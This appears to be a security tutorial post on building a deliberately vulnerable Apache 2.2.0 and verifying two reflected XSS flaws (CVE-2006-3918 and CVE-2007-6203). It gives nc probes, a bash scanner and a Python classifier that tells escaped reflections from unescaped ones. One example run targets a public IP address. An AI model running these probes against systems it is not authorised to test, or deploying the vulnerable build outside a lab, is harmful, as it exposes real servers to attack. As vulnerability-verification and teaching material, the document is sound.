Verifying Apache Cross-Site Scripting

  Linux

This is not about a new vulnerability. It shows how to build a deliberately vulnerable Apache and gives examples of verifying the issues against it.

Installing the vulnerable Apache

yum -y install gcc openssl-devel
wget http://archive.apache.org/dist/httpd/httpd-2.2.0.tar.gz
tar zxf httpd-2.2.0.tar.gz
cd httpd-2.2.0/
./configure --prefix=/usr/local/httpd-2.2.0 --enable-mods-shared=all --enable-ssl
make
sudo make install
sudo /usr/local/httpd-2.2.0/bin/apachectl start
sudo /sbin/iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 80 -s 192.168.0.0/24 -j ACCEPT

Apache Expect header cross-site scripting vulnerability

$ echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc 192.168.0.128 80
HTTP/1.1 417 Expectation Failed
Date: Wed, 27 Jan 2010 12:46:40 GMT
Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Content-Length: 360
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
field could not be met by this server.</p>
<p>The client sent<pre>
 Expect: <orz>
</pre>
but we only allow the 100-continue expectation.</p>
</body></html>

Apache HTTP method cross-site scripting

$ echo -en "<orz> / HTTP/1.1\nHost: 192.168.0.128\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc 192.168.0.128 80
HTTP/1.1 413 Request Entity Too Large
Date: Wed, 27 Jan 2010 12:47:34 GMT
Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/index.html<br />
does not allow request data with <orz> requests, or the amount of data provided in
the request exceeds the capacity limit.
</body></html>

Verification script

#!/bin/bash
# Probe an Apache server for two reflected XSS issues in its built-in
# error pages. A harmless marker ("<orz>") is sent, and the response body
# is checked for the marker coming back unescaped.
LANG=C

IPADDR=${1}
PORT=${2}

if [ -z "${IPADDR}" ] || [ -z "${PORT}" ]; then
    echo "usage: $0 <ipaddr> <port>" >&2
    exit 1
fi

echo "# Check Apache Cross Site Scripting" >&2
echo "#   (1) CVE-2006-3918: Apache Expect Header XSS" >&2
echo "#   (2) CVE-2007-6203: Apache HTTP Method XSS" >&2
echo "# IpAddr:Port,CVE-2006-3918,CVE-2007-6203" >&2
echo -n "${IPADDR}:${PORT},"
# (1) The Expect header value is reflected in the 417 error page.
echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc "${IPADDR}" "${PORT}" | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo -n ","
# (2) The request method is reflected in the 413 error page; the duplicate
#     Content-length headers are what trigger the 413 response.
echo -en "<orz> / HTTP/1.1\nHost: ${IPADDR}\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc "${IPADDR}" "${PORT}" | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo ""

exit 0
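The shell script above decides with a single grep. The following Python is an added example (not part of the original post) that makes the two halves of the problem explicit: the unsafe pattern of concatenating a client-supplied header value into an HTML error body versus the HTML-escaped form, and a classifier that tells a verbatim reflection apart from an escaped one when looking at a captured response. The sample responses are constructed here to mimic the 417 page shown above and a patched server; they were not captured from a real host, and the function names are this example's own.

```python
import html

# Marker used by the probes on this page.
PROBE = "<orz>"

# Constructed sample responses (not captured from a real server).
# One mimics Apache 2.2.0 reflecting the Expect value unescaped,
# the other mimics a server that HTML-escapes it before insertion.
RAW_VULNERABLE = (
    "HTTP/1.1 417 Expectation Failed\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html><body><p>The client sent<pre>\n Expect: <orz>\n</pre>\n"
    "but we only allow the 100-continue expectation.</p></body></html>\n"
)
RAW_PATCHED = RAW_VULNERABLE.replace("Expect: <orz>", "Expect: &lt;orz&gt;")
RAW_NOT_REFLECTED = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>Bad Request</h1></body></html>\n"
)


def render_error_page_vulnerable(header_value: str) -> str:
    """The unsafe pattern: client-controlled text pasted straight into HTML."""
    return f"<p>The client sent<pre>\n {header_value}\n</pre></p>"


def render_error_page_hardened(header_value: str) -> str:
    """Same page, but the value is HTML-escaped before insertion."""
    return f"<p>The client sent<pre>\n {html.escape(header_value)}\n</pre></p>"


def split_response(raw: str):
    """Split a raw HTTP/1.x response into (status_code, headers, body).

    Accepts both CRLF and bare LF line endings, since the probes on this
    page are sent with bare LF and some captures keep that convention.
    """
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_reflection(raw: str, probe: str = PROBE) -> str:
    """Classify a captured response with respect to the probe marker.

    'vulnerable'    : marker appears verbatim inside an HTML body
    'reflected_text': marker appears verbatim, but the body is not HTML
    'escaped'       : marker appears only in HTML-escaped form
    'not_reflected' : marker does not appear at all
    """
    _status, headers, body = split_response(raw)
    is_html = headers.get("content-type", "").startswith("text/html")
    if probe in body:
        return "vulnerable" if is_html else "reflected_text"
    if html.escape(probe) in body:
        return "escaped"
    return "not_reflected"


if __name__ == "__main__":
    for label, raw in [("vulnerable", RAW_VULNERABLE),
                       ("patched", RAW_PATCHED),
                       ("unrelated", RAW_NOT_REFLECTED)]:
        print(f"{label:10s} -> {classify_reflection(raw)}")
```

The distinction between "escaped" and "not_reflected" is the useful one for a defender: a server that still echoes the header but escapes it has the fix applied, whereas a server that never echoes it may simply be a different build or sit behind a proxy that rewrote the response.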

Example runs of the verification script

$ ./apache_xss.sh 192.168.0.128 80
# Check Apache Cross Site Scripting
#   (1) CVE-2006-3918: Apache Expect Header XSS
#   (2) CVE-2007-6203: Apache HTTP Method XSS
# IpAddr:Port,CVE-2006-3918,CVE-2007-6203
192.168.0.128:80,VULNERABLE,VULNERABLE

$ ./apache_xss.sh 116.58.170.251 80
# Check Apache Cross Site Scripting
#   (1) CVE-2006-3918: Apache Expect Header XSS
#   (2) CVE-2007-6203: Apache HTTP Method XSS
# IpAddr:Port,CVE-2006-3918,CVE-2007-6203
116.58.170.251:80,not_vulnerable,not_vulnerable